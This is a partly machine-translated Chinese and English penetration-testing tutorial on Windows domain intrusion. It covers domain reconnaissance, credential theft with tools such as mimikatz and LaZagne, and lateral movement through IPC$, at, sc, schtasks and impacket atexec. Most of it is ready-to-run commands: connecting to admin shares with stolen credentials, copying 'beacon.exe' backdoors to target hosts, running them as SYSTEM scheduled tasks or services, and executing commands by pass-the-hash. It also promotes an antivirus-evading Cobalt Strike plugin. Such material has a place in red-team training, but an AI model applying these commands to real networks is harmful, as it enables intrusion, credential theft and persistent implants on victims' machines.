Table of contents
1. Information collection (target & user & password)
1. Gather information as a dictionary
1. cs plugin---LSTAR - Aggressor
1. Information collection (target & user & password)
1. Brief introduction
1. Gather information as a dictionary
1) Target dictionary : list of networks in the domain
2) User dictionary : list of user groups in the domain
3) Password dictionary : domain password
2. Collection method
command + tool
应用&服务&权限 systeminfo 详细信息 netstat -ano 端口列表 route print 路由表 net start 启动服务 tasklist 进程列表 schtasks 计划任务 ipconfig /all 判断存在域 net view /domain 判断存在域 net time /domain 判断主域 netstat -ano 当前网络端口开放 nslookup 域名 追踪来源地址 wmic service list brief 查询本机服务 net config workstation 查询当前登录域及登录用户信息 wmic startup get command,caption 查看已启动的程序信息 网络&用户&域控 net view /domain 查询域列表 net time/domain 从域控查询时间,若当前用户是域用户会从域控返回当前时间,亦用来判 断主域,主域一般用做时间服务器 net localgroup administrators 本机管理员【通常含有域用户】 net user /domain 查询域用户(当前域) net group /domain 查询域工作组 net group "domain computers" /domain 查看加入域的所有计算机名 net group "domain admins" /domain 查询域管理员用户组和域管用户 net localgroup administrators /domain 查看域管理员 net group "domain controllers" /domain 查看域控 net accounts /domain 查看域密码策略 密码&凭据&口令 1、用户HASH,明文获取-mimikatz(win),mimipenguin(linux) https://github.com/gentilkiwi/mimikatz/ https://github.com/huntergregal/mimipenguin 2、各种协议服务口令获取-LaZagne(all),XenArmor(win),CS插件 https://github.com/AlessandroZ/LaZagne/ https://xenarmor.com/allinone-password-recovery-pro-software/ 3.站点源码备份文件、数据库备份文件等 4.各类数据库Web管理入口,如PHPMyAdmin 5.浏览器保存密码、浏览器Cookies 6.其他用户会话、3389和ipc$连接记录、回收站内容 7.Windows 保存的WIFI密码 8.网络内部的各种帐号和密码,如:Email、VPN、FTP、OA等
2. Lateral movement
1、ipc$
1. IPC$: (Internet Process Connection) is a " shared named pipe " resource
2. Function: The named pipe opened for inter-process communication can obtain the corresponding authority by verifying the user name and password. It can be used when remotely managing the computer and viewing the shared resources of the computer (you can obtain the directory structure and user list on the target host . and other information )
3. Conditions of use:
139/445 ports open: file sharing can be realized separately
The IPC$ connection uses port 445 (SMB protocol) by default, and port 139 (NetBIOS protocol) if it fails (some will force port 445 )
4. Empty connection:
That is, when ipc$ connects, no account password is required ( no authority )
If you log in as a user or administrator ( with permission )
5. Default sharing:
The default share is a share (all logical disks, system directories) that is enabled by default for the convenience of remote management by the administrator, and is accessed through an ipc connection
6. Permission issues:
Method 1: The domain management user has the authority to establish an IPC connection to the admin$ directory
Method 2: Local Administrator user (disabled by default), you can use the Administrator user to connect remotely
7. ipc$ connection failure error number
错误号 5 拒绝访问--->可能使用的用户不是管理员权限--->提升权限 错误号 51 Windows无法找到网络路径--->网络有问题 错误号 53 找不到网络路径--->ip 地址错误;目标未开机;目标 lanmanserver 服务未启动;目标有防火墙(端口过滤) 错误号 67 找不到网络名--->lanmanworkstation 服务未启动;目标删除了 ipc$ 错误号 1219 提供的凭据与已存在的凭据集冲突--->已经和对方建立了一个ipc$--->删除后再连 错误号 1326 未知的用户名或错误密码 错误号 1385 登录失败:未授予用户在此计算机上的请求登录类型--->可能“拒绝从网络访问这台计算机”功能中拒绝了该用户的访问;ipc$连接时,输入的用户不存在 错误号 1792 试图登录,但是网络登录服务没有启动--->目标NetLogon服务未启动[连接域控会出现此情况] 错误号 2242 此用户的密码已经过期--->目标有帐号策略,强制定期要求更改密码 常见原因: (1)目标系统不是NT或以上的操作系统 (2)对方未打开IPC$共享 (3)对方未开启139、445端口 (4)防火墙端口未开放 (5)命令、账号密码有错误
8. Common commands of IPC$ :
net use \\192.168.*.*\ipc$ "" /u:"" #建立空连接 net use \\192.168.*.*\ipc$ "密码" /user:"Administrator" #建立正常连接 net use #查看本机连接共享情况 dir \\xx.xx.xx.xx\C$\ #查看文件列表 net view \\192.168.*.* #查看已建立连接目标主机的共享资源 net time \\192.168.*.* #查看目标主机时间 nbtstat -A 192.168.*.* #查看目标主机的NetBIOS用户(自己本机也需开启) net use \\192.168.*.*\ipc$ /del /y #删除本机与指定ip建立的连接 net use * /del /y #删除本机所有已建立的连接 copy 1.exe \\192.168.*.*\c$\windows\temp\1.exe #文件的上传下载 copy vps.exe \192.168.*.*\c$ #将本目录下的指定文件复制到目标系统中 xcopy d:\sqlitedata\*.* \\192.168.*.*\c$\temp /E /Y /D #上传本地文件到目标的:c\windows\temp\目录下 copy \\192.168.*.*\c$\plugin_update.exe c:\ #下载目标文件到本地c盘下 net share c$ /del #删除默认共享 net share c$=c: #恢复默认共享 net use z: \\192.168.*.*\c$ "密码" /user:"administrator" #映射路径:对方的c盘映射为自己的z盘(其他盘类推) net use z: \\192.168.*.*\c$ #访问 net use c: /del #删除映射的c盘 net use * /del #删除全部,会有提示要求按y确认
2. at command
1. Brief description: scheduled tasks (install at software package + open atd service)
2. Common commands
at \192.168.*.* 17:00:00 C:\vps.exe #使用at创建计划任务 at \192.168.*.* 作业ID /delete #清除at记录 at \192.168.*.* 17:00:00 cmd.exe /c "ipconfig > C:/1.txt " #使用at命令执行,将执行结果写入本地文本文件,再使用type命令查看该文件的内容 type \192.168.*.*\C$\1.txt #查看生成的1.txt文件 at \\192.168.*.* 11:23 cmd /c "c:\windows\temp\test.bat" #设置定时任务,cmd下执行批处理脚本
3. sc command:
1. Brief introduction: The SC command is a powerful DOS command in the XP system, and the SC command can communicate with the "service controller" and the installed equipment. SC is a command-line program used to communicate with the Service Control Manager and services
2. Function:
1) Retrieve and set control information about the service
2) Change the startup state of the service : Set the service properties stored in the registry to control how the service application is started at startup and how it runs as a background program
3) Delete useless services in the system
4) Configure the specified service , retrieve the status of the current service, and also stop and start the service (functionally similar to the NET STOP/START command, but SC is faster and can stop more services)
5) Create a batch file to call different SC commands to automatically start or shut down the service sequence
3. Format:
The SC command cannot be used alone , it must be used in combination with other commands
24个: sc boot sc config sc continue sc control sc create sc delete sc descrīption sc enumdepend sc failure sc getdisplayname sc getkeyname sc interrogate sc lock sc pause sc qc sc qdescrīption sc qfailure sc query sc queryex sc querylock sc sdset sc sdshow sc start sc stopSC command format : SC [Servername] command Servicename [Optionname= Optionvalues]
1、Servername:指定服务所在的远程服务器的名称。名称必须采用通用命名约定 (UNC) 格式(“\\myserver”)。要在本地运行SC.exe,请忽略此参数。 2、command :即以上提到的那24个命令(SC后面的那个,如query,start,stop,create,config等) 3、Servicename:服务名,也就是要配置的那个服务的名字,例如你要启动一个服务你就输入sc start +你要启动的服务名。(注意这里的服务名不是服务的显示名称,而是服务名称,这个服务名称可以在系统管理工具下的服务中可以看到,例如在服务中双击DHCP Client可以看到其服务名称是Dhcp,而那个DHCP Client是显示名称,可以用sc命令来更改一个服务的显示名称) 4、Optionname= Optionvalues:是选项名和选项的值。
4. Example:
To automatically load the themes service when the system starts, you can use
sc config themes start= autoThe following start is the option, and auto is the value of the option. (Note that there is a space after the = sign , and all options that use options must add a space after the = sign and add the option value)
5. Use:
#copy到目标主机 copy test.exe \\192.168.*.*\c$ #创建计划任务 sc \\192.168.*.* create shell binpath= "c:\test.exe" start= auto displayname= "shellstart" sc \\192.168.*.* create test binpath= "c:\windows\temp\test.bat" start= auto displayname= "shellstart" #启动、停止、删除 sc \\192.168.*.* start test sc \\192.168.*.* stop test sc \\192.168.*.* del test
4, schtasks (planned tasks)
1. Brief description: Schedule commands and programs to run regularly or at a specific time , add and delete tasks in the plan, start and stop tasks on demand, and display and change scheduled tasks (you can also use the schtasks.exe tool)
2. Advantages and disadvantages: Windows Vista, Windows Server 2008 and later versions of the operating system have abandoned the at command and switched to the schtasks command. The schtasks command is more flexible than the at command. When using the schtasks command, a log file will be left in the system : C:\Windows\Tasks\SchedLgU.txt
3. Permissions:
1) To schedule, view and change all tasks on the local computer, you must be a member of the Administrators group
——————
2) To schedule, view, and change all tasks on a remote computer, you must be a member of the Administrators group on the remote computer , or you must provide the remote computer administrator's credentials with the /u parameter
——————
3) If the local computer and the remote computer are in the same domain , or the local computer is in a domain trusted by the remote computer domain, you can use the /u parameter in the /create or /change operation . Otherwise, the remote computer cannot authenticate the specified user account and cannot verify that the account is a member of the Administrators group
——————
4) Tasks scheduled to run must have appropriate permissions; these permissions vary by task. By default, the task runs with the permissions of the current user on the local computer, or the user specified by the /u parameter . To run the task with the privileges of a different user account or with system privileges , use the /ru parameter
4. Grammar:
schtasks /change #更改任务的以下一个或多个属性:任务运行的程序 (/tr);运行任务的用户帐户 (/ru);用户帐户的密码 (/rp);将仅交互式属性添加到任务 (/it) schtasks /create #计划新任务 schtasks /delete #删除计划任务 schtasks /end #停止任务启动的程序 schtasks /query #显示计划在计算机上运行的任务 schtasks /run #立即启动计划任务。 运行操作会忽略计划,但使用任务中保存的程序文件位置、用户帐户和密码立即运行任务(Related commands come from Microsoft official documents)
schtasks /create creates a scheduled task: parameters
#/sc 启动时间参数为MINUTE、HOURLY、DAILY、WEEKLY等时,需要指定/mo运行的间隔时间 /sc onlogon 用户登录时启动 /sc onstart 系统启动时启动 /sc onidle 系统空闲时启动 参数: /sc 计划任务类型,可选值为MINUTE、HOURLY、DAILY、WEEKLY、ONCE、ONSTART、ONLOGON、ONIDLE、MONTHLY、ONEVENT /tn 计划任务名称,后续查询、修改、删除、执行时使用 /tr 需要运行的程序或命令,传入的命令中间如果有空格会被截断为程序和参数,因此需要将双引号转义并传入。 /ru 运行任务的用户账户名,不使用此参数的话使用执行schtasks命令的账户运行计划任务 /rp 运行任务的用户账户密码 /mo 指定任务在计划类型中的运行间隔 /d 指定任务在一个月或者星期的某一天运行,只适用于MONTHLY和WEEKLY类型。 /m 指定任务在某个月运行,只适用于MONTHLY类型。 /i 当计划任务类型为ONIDLE时,运行任务前计算机处于空闲状态的分钟数。 /st 当计划任务类型为MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY时使用,指定任务的开始时间,默认为本地计算机的当前时间。 /ri 指定计划任务的重复间隔,以分钟为单位。不适合计划类型:MINUTE、HOURLY、ONSTART、ONLOGON、ONIDLE /et 指定计划任务的结束时间,适用于计划类型:MINUTE、HOURLY, 在指定的结束时间之后,schtasks 不会再次启动任务,除非当前系统时间调回开始时间。默认情况下,没有结束时间。 /du 指定任务计划的持续时间,与/et类似,默认情况下没有持续时间。 /k 在指定计划任务的结束时间或持续时间后停止任务,如果不加此参数,则在时间到了会继续运行或者重启该任务。 /it 只在用户登录时运行 /z 在任务计划完成后删除任务计划 /f 在创建任务时如果任务已存在不显示警告 /RL 为作业设置运行级别。有效值为LIMITED 和 HIGHEST。默认值为 LIMITED。 /F 如果指定的任务已经存在,则强制创建任务并抑制警告。
5. Common commands :
schtasks /create /s 192.168.*.* /tn test /sc HOURLY /mo 1 /tr c:\vps.exe /ru system /f #在目标主机上创建一个名为test的计划任务,启动程序为C:\vps.exe,启动权限为system,启动时间为每隔一小时启动一次 schtasks /query | findstr test #查询该test计划任务 schtasks /run /s 192.168.*.* /i /tn "test" #启动该test计划任务 schtasks /delete /s 192.168.*.* /tn "test" /f #删除该test计划任务 注意:查看目标主机时间(可能不一样的,嘿嘿嘿) #创建计划任务 schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 12:00 /S 192.168.*.* /RU System /u administrator /p "密码" #立即执行计划任务 schtasks /run /tn "plugin_update" /S 192.168.*.* /u administrator /p "密码" #删除计划任务 schtasks /F /delete /tn "plugin_update" /S 192.168.*.* /u administrator /p "密码" #计划任务远程开启默认共享 schtasks /create /tn "plugin_update" /tr "cmd /c net share c$=c:" /sc once /st 12:00 /S 192.168.*.* /RU System /u administrator /p "密码"
3. Use example
1. Process:
1) Lateral movement: ipc connection---->create scheduled task (at|schtasks)---->execute scheduled task--->impacket-atexec tries to connect
2) Go online: copy the backdoor/use the command to download the backdoor---->execute the backdoor file/related commands
2. Example:
1) at command
net use \\192.168.3.21\ipc$ "密码" /user:god.org\administrator # 建立ipc连接(域名主机名) copy beacon.exe \\192.168.*.*\c$ #上传马:copy执行文件到目标主机 net time \\192.168.*.* #查看时间 at \\192.168.*.* 12:00 c:\beacon.exe #添加计划任务
2) schtasks command
net use \\192.168.*.*\ipc$ "密码" /user:god.org\administrator # 建立ipc连接(域名主机名) copy beacon.exe \\192.168.*.*\c$ #复制文件到其C盘 net time \\192.168.*.* #查看时间 schtasks /create /s 192.168.*.* /u administrator /p 密码 /sc DAILY /tn beacon /tr 'c:\4.exe' /ST 12:00 /f #创beacon任务对应执行文件 schtasks /run /s 192.168.*.* /tn beacon /i #运行beacon任务 schtasks /delete /s 192.168.*.* /tn beacon /f #删除beacon任务
4. Tools
1. cs plugin---LSTAR - Aggressor
1) Brief description:
1、一个插件从上线到域控 实现内网漫游 2、本着简化 CS 右键和方便自己集成的目的,参考大量后渗透插件 3、重构和丰富了主机相关凭据获取、多级内网穿透、隐蔽计划任务、免杀的 Mimikatz 和克隆添加用户等功能 4、功能特性: 通过配合 CobaltStrike 的 TCP、SMB、Proxy 等不出网主机上线方式,穿透复杂网络环境 针对 RDP 相关、AddUser、LsassDump 等功能提供多种免杀执行方式,应对冷门环境 集成多个使用 WinAPI 或 Assembly 内存加载方式运行的影子用户、隐蔽计划任务等免杀功能
2) Project address:
(The project brief is from the project address)
https://github.com/lintstar/LSTAR
2、impacket-atexec
1) Brief description:
Impack is a collection of Python classes for working with network protocols. Impack focuses on providing low-level programmatic access to packets and for some protocols such as SMB1-3 and MSRPC provides the protocol implementation itself. Packets can be built from scratch or parsed from raw data, and the object-oriented API makes it easy to deal with the deep hierarchies of protocols. The library provides a set of tools as examples of what can be done in the context of the library
(from project address)
2) Function:
This tool is a semi-interactive tool, suitable for use under Webshell and Socks proxy; it can collect user names, plaintext passwords, password hashes, remote hosts, etc. into dictionaries during penetration and utilization, and batch testing
3) Project address ( py version )
4) Example:
python atexec.py god/administrator:[email protected].*.* "ver" python atexec.py -hashes :…… ./[email protected].*.* "whoami"
5) Exe version:
CS本地用户明文连接: shell atexec.exe ./administrator:密码@192.168.*.* "whoami" CS域内用户明文连接: shell atexec.exe god/administrator:密码@192.168.*.* "ver" CS域内本地用户明文密文连接: shell atexec.exe -hashes :…… ./[email protected].*.* "whoami" shell atexec.exe -hashes :…… god/[email protected].*.* "whoami"
